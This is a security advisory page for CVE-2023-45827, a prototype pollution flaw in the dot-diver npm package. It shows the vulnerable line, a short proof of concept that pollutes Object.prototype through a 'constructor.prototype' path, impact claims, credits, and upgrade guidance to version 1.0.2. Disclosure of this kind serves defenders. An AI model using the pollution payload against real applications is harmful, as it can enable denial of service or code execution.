CVE-2023-45827

Description

### Summary There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE. ### Details ```javascript //https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277 // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access objectToSet[lastKey] = value ``` In this code, there is no validation for Prototpye Pollution. ### PoC ```javascript import { getByPath, setByPath } from '@clickbar/dot-diver' console.log({}.polluted); // undefined setByPath({},'constructor.prototype.polluted', 'foo'); console.log({}.polluted); // foo ``` ### Impact It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc. ### Credits Team : NodeBoB 최지혁 ( Jihyeok Choi ) 이동하 ( Lee Dong Ha of ZeroPointer Lab ) 강성현    ( kang seonghyeun ) 박성진    ( sungjin park ) 김찬호    ( Chanho Kim ) 이수영    ( Lee Su Young ) 김민욱    ( MinUk Kim )

How to fix CVE-2023-45827

To remediate CVE-2023-45827, upgrade the affected package to a fixed version below.

• —upgrade to 1.0.2 or later

Is CVE-2023-45827 being exploited?

Moderate — EPSS is 10.2%. Track this CVE but it's not at the top of the prioritisation list.

Affected packages (1)

• from 0, < 1.0.2

CVSS scores

References (5)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2023-45827
• PATCHgithub.com/clickbar/dot-diver
• WEBgithub.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f
• WEBgithub.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a